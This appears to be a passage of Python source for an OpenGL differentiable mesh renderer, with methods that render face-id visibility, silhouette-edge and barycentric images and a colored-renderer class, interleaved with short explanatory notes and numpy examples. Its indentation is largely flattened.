GL.glEnable(GL.GL_DEPTH_TEST)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
GL.glPolygonOffset(1, 1)
self.draw_colored_verts(np.zeros_like(self.vc.r))
GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT)
ec = np.arange(1, len(e)+1)
ec = np.tile(ec.reshape((-1,1)), (1, 3))
ec[:, 0] = ec[:, 0] & 255
ec[:, 1] = (ec[:, 1] >> 8 ) & 255
ec[:, 2] = (ec[:, 2] >> 16 ) & 255
ec = np.asarray(ec, dtype=np.uint8)
# GL.glDepthFunc(GL.GL_GREATER)
# GL.glEnable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glPolygonOffset(-10000.0, -10000.0)
# GL.glDepthMask(GL.GL_FALSE)
# self.projectionMatrix[2, 2] += 0.0000001
GL.glDepthFunc(GL.GL_LEQUAL)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn_ub, v, e, ec)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDepthFunc(GL.GL_LESS)
# self.projectionMatrix[2, 2] -= 0.0000001
# GL.glDisable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glDepthMask(GL.GL_TRUE)
# if hidden_wireframe:
# GL.glEnable(GL.GL_DEPTH_TEST)
# GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
# #Pol change it to a smaller number to avoid double edges in my teapot.
# GL.glPolygonOffset(1.0, 1.0)
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# # self.draw_colored_primitives(self.vao_dyn_ub, v, f, fc=np.zeros(f.shape).astype(np.uint8))
# self.draw_colored_verts(np.zeros_like(self.vc.r))
# # self.draw_colored_primitives(self.vaoub, v, e, np.zeros_like(ec).astype(np.uint8))
# # self.projectionMatrix[2,2] -= delta
# GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
        raw = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))
raw = raw[:,:,0] + raw[:,:,1]*256 + raw[:,:,2]*256*256 - 1
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
return raw
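The 24-bit id scheme above can be checked in isolation: each 1-based primitive id is split into its low, middle, and high bytes for the R, G, and B channels, and the readback path reassembles them and subtracts one, so a black background pixel decodes to 4294967295 under uint32 wraparound. A minimal round-trip sketch, independent of any GL state (helper names are illustrative, not part of the renderer):

```python
import numpy as np

def pack_ids_to_rgb(n):
    # 1-based ids so that 0 (the black clear color) is reserved for background
    ids = np.arange(1, n + 1)
    rgb = np.tile(ids.reshape((-1, 1)), (1, 3))
    rgb[:, 0] = rgb[:, 0] & 255
    rgb[:, 1] = (rgb[:, 1] >> 8) & 255
    rgb[:, 2] = (rgb[:, 2] >> 16) & 255
    return np.asarray(rgb, dtype=np.uint8)

def unpack_rgb_to_ids(rgb):
    # mirror of the readback decode: little-endian byte reassembly, then -1
    rgb = rgb.astype(np.uint32)
    return rgb[:, 0] + rgb[:, 1] * 256 + rgb[:, 2] * 256 * 256 - 1

rgb = pack_ids_to_rgb(70000)   # > 65536, so all three bytes are exercised
ids = unpack_rgb_to_ids(rgb)   # round-trips back to 0..69999
```

A background pixel (0, 0, 0) decodes to 0 - 1, which wraps to 4294967295 in uint32 arithmetic, matching the sentinel tested throughout this file.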
def draw_edge_visibility_aa(self, v, e, f, hidden_wireframe=True):
"""Assumes camera is set up correctly in gl context."""
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
GL.glPolygonOffset(1, 1)
self.draw_colored_verts(np.zeros_like(self.vc.r))
GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT)
ec = np.arange(1, len(e)+1)
ec = np.tile(ec.reshape((-1,1)), (1, 3))
ec[:, 0] = ec[:, 0] & 255
ec[:, 1] = (ec[:, 1] >> 8 ) & 255
ec[:, 2] = (ec[:, 2] >> 16 ) & 255
ec = np.asarray(ec, dtype=np.uint8)
ec = np.ones_like(ec, dtype=np.uint8)*255
# GL.glDepthFunc(GL.GL_GREATER)
# GL.glEnable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glPolygonOffset(-10000.0, -10000.0)
# GL.glDepthMask(GL.GL_FALSE)
# self.projectionMatrix[2, 2] += 0.0000001
GL.glDepthFunc(GL.GL_LEQUAL)
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
GL.glEnable(GL.GL_LINE_SMOOTH)
GL.glEnable(GL.GL_BLEND)
# GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(1)
self.draw_colored_primitives(self.vao_dyn_ub, v, e, ec)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glLineWidth(self.line_width)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glDisable(GL.GL_LINE_SMOOTH)
GL.glDisable(GL.GL_BLEND)
GL.glDepthFunc(GL.GL_LESS)
# self.projectionMatrix[2, 2] -= 0.0000001
# GL.glDisable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glDepthMask(GL.GL_TRUE)
# if hidden_wireframe:
# GL.glEnable(GL.GL_DEPTH_TEST)
# GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
# #Pol change it to a smaller number to avoid double edges in my teapot.
# GL.glPolygonOffset(1.0, 1.0)
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# # self.draw_colored_primitives(self.vao_dyn_ub, v, f, fc=np.zeros(f.shape).astype(np.uint8))
# self.draw_colored_verts(np.zeros_like(self.vc.r))
# # self.draw_colored_primitives(self.vaoub, v, e, np.zeros_like(ec).astype(np.uint8))
# # self.projectionMatrix[2,2] -= delta
# GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
raw = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.uint32))
raw = raw[:,:,0] + raw[:,:,1]*256 + raw[:,:,2]*256*256
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
return raw
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives(self, vao, v, f, fc=None):
GL.glUseProgram(self.colorProgram)
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1,3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
if isinstance(fc[0,0], np.float32) or isinstance(fc[0,0], np.float64):
vc_by_face = np.asarray(vc_by_face, dtype=np.float32, order='C')
self.vbo_colors.set_array(vc_by_face)
self.vbo_colors.bind()
elif isinstance(fc[0,0], np.uint8):
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
else:
raise Exception('Unknown color type for fc')
else:
self.vbo_colors.set_array(np.zeros_like(verts_by_face, dtype=np.float32))
self.vbo_colors.bind()
if f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
# if primtype == GL.GL_LINES:
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# else:
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
#Pol: FIX THIS (UNCOMMENT)
if primtype == GL.GL_LINES:
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
f = np.fliplr(f).copy()
verts_by_edge = v.reshape((-1,3))[f.ravel()]
verts_by_edge = np.asarray(verts_by_edge, dtype=np.float32, order='C')
self.vbo_verts_dyn.set_array(verts_by_edge)
self.vbo_verts_dyn.bind()
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
# GL.glDrawElements(GL.GL_LINES, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
def compute_vpe_boundary_idxs(self, v, f, camera, fpe):
# Figure out which edges are on pairs of differently visible triangles
#ray = cv2.Rodrigues(camera.rt.r)[0].T[:,2]
campos = -cv2.Rodrigues(camera.rt.r)[0].T.dot(camera.t.r)
rays_to_verts = v.reshape((-1,3)) - row(campos)
rays_to_faces = rays_to_verts.take(f[:,0],axis=0) +rays_to_verts.take(f[:,1],axis=0) +rays_to_verts.take(f[:,2],axis=0)
# rays_to_faces = np.sum(rays_to_verts.take(f[:,:],axis=0), axis=1)
faces_invisible = np.sum(rays_to_faces * self.tn, axis=1)
dps = faces_invisible.take(fpe[:,0]) * faces_invisible.take(fpe[:,1])
# dps = faces_invisible0 * faces_invisible1
# idxs = (dps<=0) & (faces_invisible.take(fpe[:,0]) + faces_invisible.take(fpe[:,1]) > 0.0)
silhouette_edges = np.asarray(np.nonzero(dps<=0.)[0], np.uint32)
self.vis_silhouette_face = np.c_[faces_invisible.take(fpe[:, 0])[dps <= 0.], faces_invisible.take(fpe[:, 1])[dps <= 0.]] < 0
# silhouette_edges = np.asarray(np.nonzero(dps<=1e-5)[0], np.uint32)
return silhouette_edges, faces_invisible < 0
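compute_vpe_boundary_idxs classifies an edge as a silhouette edge when its two adjacent faces face opposite ways relative to the viewing ray, i.e. when the product of their ray-normal dot products is non-positive. A toy sketch of that sign test (the dot products and edge-to-face table here are made up for illustration):

```python
import numpy as np

# Hypothetical per-face dot products of the view ray with each face normal
# (positive = back-facing, negative = front-facing) ...
faces_invisible = np.array([-1.0, 2.0, -0.5, 3.0])
# ... and the two adjacent faces of each edge (one row per edge).
fpe = np.array([[0, 1], [1, 3], [2, 3]])

# An edge straddles a front/back transition iff the product is <= 0.
dps = faces_invisible.take(fpe[:, 0]) * faces_invisible.take(fpe[:, 1])
silhouette_edges = np.asarray(np.nonzero(dps <= 0.0)[0], np.uint32)
# edges 0 and 2 are silhouette edges; edge 1 joins two back-facing faces
```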
def draw_boundaryid_image(self, v, f, vpe, fpe, camera):
GL.glUseProgram(self.colorProgram)
if False:
visibility = self.draw_edge_visibility(v, vpe, f, hidden_wireframe=True)
return visibility
if True:
#try:
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT);
silhouette_edges, faces_facing_camera = self.compute_vpe_boundary_idxs(v, f, camera, fpe)
# self.faces_facing_camera = faces_facing_camera
self.silhouette_edges = silhouette_edges
lines_e = vpe[silhouette_edges]
self.lines_e = lines_e
lines_v = v
if len(lines_e)==0:
return np.ones((self.frustum['height'], self.frustum['width'])).astype(np.uint32) * 4294967295
# fpe = fpe[np.any(np.in1d(fpe, np.unique(self.visibility_image[self.visibility_image != 4294967295])).reshape([-1, 2]), 1)]
visibility = self.draw_edge_visibility(lines_v, lines_e, f, hidden_wireframe=True)
visibility_edge = visibility.copy()
# plt.imsave("opendr_boundary_edge_visibility.png", visibility)
shape = visibility.shape
visibility = visibility.ravel()
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
visibility[visible] = silhouette_edges.take(visibility.take(visible))
self.frontFacingEdgeFaces = np.zeros([visibility_edge.shape[0],visibility_edge.shape[1], 2]).astype(np.int32).reshape([-1,2])
self.frontFacingEdgeFaces[visible] = self.vis_silhouette_face[visibility_edge.ravel().take(visible)]
# plt.imsave("opendr_boundary_edge_visibility_result.png", visibility.reshape(shape))
return visibility.reshape(shape)
def draw_boundaryid_image_aa(self, v, f, vpe, fpe, camera):
GL.glUseProgram(self.colorProgram)
if False:
visibility = self.draw_edge_visibility(v, vpe, f, hidden_wireframe=True)
return visibility
if True:
#try:
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT);
silhouette_edges, faces_facing_camera = self.compute_vpe_boundary_idxs(v, f, camera, fpe)
# self.faces_facing_camera = faces_facing_camera
self.silhouette_edges = silhouette_edges
lines_e = vpe[silhouette_edges]
self.lines_e = lines_e
lines_v = v
if len(lines_e)==0:
return np.ones((self.frustum['height'], self.frustum['width'])).astype(np.uint32) * 4294967295
# fpe = fpe[np.any(np.in1d(fpe, np.unique(self.visibility_image[self.visibility_image != 4294967295])).reshape([-1, 2]), 1)]
visibility = self.draw_edge_visibility_aa(lines_v, lines_e, f, hidden_wireframe=True)
visibility_edge = visibility.copy()
# plt.imsave("opendr_boundary_edge_visibility.png", visibility)
shape = visibility.shape
visibility = visibility.ravel()
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
visibility[visible] = silhouette_edges.take(visibility.take(visible))
self.frontFacingEdgeFaces = np.zeros([visibility_edge.shape[0],visibility_edge.shape[1], 2]).astype(np.int32).reshape([-1,2])
self.frontFacingEdgeFaces[visible] = self.vis_silhouette_face[visibility_edge.ravel().take(visible)]
# plt.imsave("opendr_boundary_edge_visibility_result.png", visibility.reshape(shape))
return visibility.reshape(shape)
def draw_visibility_image(self, v, f, boundarybool_image=None):
v = np.asarray(v)
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
shaders.glUseProgram(self.colorProgram)
self.makeCurrentContext()
result = self.draw_visibility_image_internal(v, f)
if boundarybool_image is None:
return result
rr = result.ravel()
faces_to_draw = np.unique(rr[rr != 4294967295])
if len(faces_to_draw)==0:
result = np.ones((self.frustum['height'], self.frustum['width'])).astype(np.uint32)*4294967295
return result
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
result2 = self.draw_visibility_image_internal(v, f)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
bbi = boundarybool_image
# result2 = result2.ravel()
# idxs = result2 != 4294967295
# result2[idxs] = faces_to_draw[result2[idxs]]
if False:
import matplotlib.pyplot as plt
result2 = result2.reshape(result.shape[:2])
plt.figure()
plt.subplot(121)
plt.imshow(result.squeeze())
plt.subplot(122)
plt.imshow(result2.squeeze())
plt.show()
pdb.set_trace()
result2 = result2.reshape(result.shape[:2])
return result2 * bbi + result * (1 - bbi)
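The final line composites the two rasterization passes per pixel: where boundarybool_image is 1 the wireframe-pass ids win, elsewhere the filled-polygon ids remain. On hypothetical 2x2 data:

```python
import numpy as np

# Hypothetical per-pixel face ids from the fill pass and the line pass,
# plus a boundary mask (1 = boundary pixel, take the line-pass value).
fill = np.array([[10, 20], [30, 40]], dtype=np.uint32)
line = np.array([[1, 2], [3, 4]], dtype=np.uint32)
bbi = np.array([[1, 0], [0, 1]], dtype=np.uint32)

blended = line * bbi + fill * (1 - bbi)
# → [[1, 20], [30, 4]]
```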
def draw_visibility_image_internal(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.colorProgram)
#Attach FBO
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f)+1)
fc = np.tile(fc.reshape((-1,1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8 ) & 255
fc[:, 2] = (fc[:, 2] >> 16 ) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives(self.vao_dyn_ub, v, f, fc)
#Read image.
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
raw = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.uint32))
# plt.imsave("draw_edge_visibility_internal_raw1.png", raw)
return raw[:,:,0] + raw[:,:,1]*256 + raw[:,:,2]*256*256 - 1
def draw_barycentric_image(self, boundarybool_image=None):
GL.glDisable(GL.GL_CULL_FACE)
without_overdraw = self.draw_barycentric_image_internal()
if boundarybool_image is None:
return without_overdraw
# return without_overdraw
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
overdraw = self.draw_barycentric_image_internal()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
bbi = np.atleast_3d(boundarybool_image)
return bbi * overdraw + (1. - bbi) * without_overdraw
def draw_barycentric_image_internal(self):
GL.glUseProgram(self.colorProgram)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glBindVertexArray(self.vao_static_face)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glDrawElements(GL.GL_TRIANGLES if self.f.shape[1]==3 else GL.GL_LINES, len(self.vbo_indices_range), GL.GL_UNSIGNED_INT, None)
#Read image.
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# return np.array(im.transpose(Image.FLIP_TOP_BOTTOM), np.float64)/255.0
return np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.float64))/255.0
def setup_camera(self, camera):
near = 0.01
far = 10
fx = camera.f.r[0]
fy = camera.f.r[1]
cx = camera.c.r[0]
cy = camera.c.r[1]
self.projectionMatrix = np.array([[fx / cx, 0, 0, 0], [0, fy / cy, 0, 0], [0, 0, -(near + far) / (far - near), -2 * near * far / (far - near)], [0, 0, -1, 0]], dtype=np.float32)
# self.projectionMatrix = np.array([[camera.f.r[0], 0, camera.c.r[0], 0], [0, camera.f.r[1], camera.c.r[1], 0], [0, 0, 1, 0], [0, 0, 1, 0]], dtype=np.float32, order='F')
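setup_camera builds an OpenGL-style projection from pinhole intrinsics, with the field of view fixed by f/c (so the principal point is assumed to sit at the image center). A standalone sketch of the same matrix, checking that points on the optical axis at the near and far planes land on the NDC z = -1 and z = +1 boundaries:

```python
import numpy as np

def projection_from_intrinsics(fx, fy, cx, cy, near=0.01, far=10.0):
    # Same layout as setup_camera above: OpenGL clip-space convention,
    # camera looking down -z, principal point assumed at the image center.
    return np.array([
        [fx / cx, 0, 0, 0],
        [0, fy / cy, 0, 0],
        [0, 0, -(near + far) / (far - near), -2 * near * far / (far - near)],
        [0, 0, -1, 0]], dtype=np.float32)

P = projection_from_intrinsics(500.0, 500.0, 320.0, 240.0)
# Optical-axis points at the near/far planes, in homogeneous camera coords.
p_near = P.dot(np.array([0, 0, -0.01, 1], dtype=np.float32))
p_far = P.dot(np.array([0, 0, -10.0, 1], dtype=np.float32))
# After perspective divide: p_near z → -1, p_far z → +1
```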
def setup_camera_old(self, camera, frustum):
self._setup_camera(camera.c.r[0], camera.c.r[1],
camera.f.r[0], camera.f.r[1],
frustum['width'], frustum['height'],
frustum['near'], frustum['far'],
camera.view_matrix,
camera.k.r)
class ColoredRenderer(BaseRenderer):
terms = 'f', 'frustum', 'background_image', 'overdraw', 'num_channels'
dterms = 'vc', 'camera', 'bgcolor' , 'v'
@depends_on('vc')
def num_channels(self):
if hasattr(self, 'vc'):
return self.vc.shape[1]
return 3
def clear(self):
# print ("Clearing color renderer.")
super().clear()
@property
def shape(self):
if not hasattr(self, 'num_channels'):
self.num_channels = 3
if self.num_channels > 1:
return (self.frustum['height'], self.frustum['width'], self.num_channels)
else:
return (self.frustum['height'], self.frustum['width'])
def compute_r(self):
return self.color_image # .reshape((self.frustum['height'], self.frustum['width'], -1)).squeeze()
def compute_dr_wrt(self, wrt):
if wrt is not self.camera and wrt is not self.vc and wrt is not self.bgcolor:
return None
visibility = self.visibility_image
shape = visibility.shape
color = self.color_image
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
num_visible = len(visible)
barycentric = self.barycentric_image
if wrt is self.camera:
if self.overdraw:
# return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
else:
return common.dImage_wrt_2dVerts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f)
elif wrt is self.vc:
return common.dr_wrt_vc(visible, visibility, self.f, barycentric, self.frustum, self.vc.size, num_channels=self.num_channels)
elif wrt is self.bgcolor:
return common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
def on_changed(self, which):
if 'frustum' in which:
w = self.frustum['width']
h = self.frustum['height']
if 'frustum' in which or 'camera' in which:
self.setup_camera(self.camera)
# setup_camera(self.glf, self.camera, self.frustum)
if not hasattr(self, 'num_channels'):
self.num_channels = 3
if not hasattr(self, 'bgcolor'):
self.bgcolor = Ch(np.array([.5]*self.num_channels))
which.add('bgcolor')
if not hasattr(self, 'overdraw'):
self.overdraw = True
'''
if 'v' or 'f' in which:
self.vbo_verts_face.set_array(np.array(self.verts_by_face).astype(np.float32))
self.vbo_verts_face.bind()
self.vbo_colors_face.set_array(np.array(self.vc_by_face).astype(np.float32))
self.vbo_colors_face.bind()
if 'v' in which:
self.vbo_verts.set_array(self.v.r.astype(np.float32))
self.vbo_verts.bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
'''
def flow_to(self, v_next, cam_next=None):
return common.flow_to(self, v_next, cam_next)
def filter_for_triangles(self, which_triangles):
cim = self.color_image
vim = self.visibility_image+1
arr = np.zeros(len(self.f)+1)
arr[which_triangles+1] = 1
relevant_pixels = arr[vim.ravel()]
cim2 = cim.copy() * np.atleast_3d(relevant_pixels.reshape(vim.shape))
relevant_pixels = np.nonzero(arr[vim.ravel()])[0]
xs = relevant_pixels % vim.shape[1]
ys = relevant_pixels // vim.shape[1]
return cim2[np.min(ys):np.max(ys), np.min(xs):np.max(xs), :]
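filter_for_triangles relies on a lookup-table trick: shifting the visibility image by one maps the 4294967295 background sentinel to slot 0 under uint32 wraparound, after which a per-pixel keep mask is a single fancy-indexing pass. On hypothetical data:

```python
import numpy as np

# Hypothetical 2x2 visibility image holding 0-based face ids, with
# 4294967295 marking background pixels.
vis = np.array([[0, 4294967295], [2, 1]], dtype=np.uint32)
which_triangles = np.array([0, 2])  # faces we want to keep

vim = vis + 1                # background wraps to 0
arr = np.zeros(3 + 1)        # one slot per face, plus slot 0 for background
arr[which_triangles + 1] = 1
mask = arr[vim.ravel()].reshape(vis.shape)
# → [[1, 0], [1, 0]]: kept faces on, background and face 1 off
```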
def draw_color_image(self):
self.makeCurrentContext()
self._call_on_changed()
try:
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
self.draw_colored_verts(self.vc.r)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.float64))/255.0
# plt.imsave("opendr_draw_color_image.png", result)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,self.num_channels)).squeeze()
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
except Exception:
import pdb; pdb.set_trace()
'''
@depends_on(dterms+terms)
def color_image(self):
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image()
if not self.overdraw:
return no_overdraw
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
overdraw = self.draw_color_image()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
boundarybool_image = self.boundarybool_image
if self.num_channels > 1:
boundarybool_image = np.atleast_3d(boundarybool_image)
return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
'''
class TexturedRenderer(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
# def __init__(self):
# try:
# self.overdraw
# except:
# self.overdraw = True
#
# try:
# self.nsamples
# except:
# self.nsamples = 8
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for vbo in self.vbo_colors_mesh]
[vbo.bind() for vbo in self.vbo_colors_mesh]
[vbo.delete() for vbo in self.vbo_colors_mesh]
[vbo.unbind() for vbo in self.vbo_colors_mesh]
